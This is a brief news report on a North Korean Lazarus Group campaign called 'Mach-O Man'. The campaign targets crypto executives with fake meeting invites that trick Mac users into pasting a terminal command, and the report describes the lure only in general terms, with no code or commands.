North Korean Lazarus Group Deploys 'Mach-O Man' Malware Targeting Crypto Executives

The North Korean state-run Lazarus Group has launched a high-intensity campaign dubbed 'Mach-O Man,' designed to infiltrate corporate systems and steal credentials from fintech and cryptocurrency executives. Security experts from CertiK warn that the group is operating with institutional speed and scale, treating crypto theft as a national industry. In the past fortnight alone, the collective has reportedly stolen more than $500 million via exploits targeting Drift and KelpDAO. This activity is part of a broader pattern of state-directed financial operations, with the group's cumulative loot estimated at $6.7 billion since 2017. The attack utilizes a delivery method known as 'ClickFix.' Attackers send urgent meeting invites via Telegram for platforms such as Zoom, Microsoft Teams, or Google Meet. Victims are directed to a fraudulent website that prompts them to copy and paste a specific command into their Mac terminal to 'fix' a simulated connection issue. By executing this command, victims grant the hackers immediate access to corporate systems, SaaS platforms, and financial resources. The malware, developed by the Chollima division, uses native Mach-O binaries tailored for Apple environments. Because the victim manually initiates the action, traditional security controls often fail to detect the breach. Furthermore, the malware is designed to erase itself after the exploit is complete, often leaving victims unaware of the compromise until the financial damage is already done.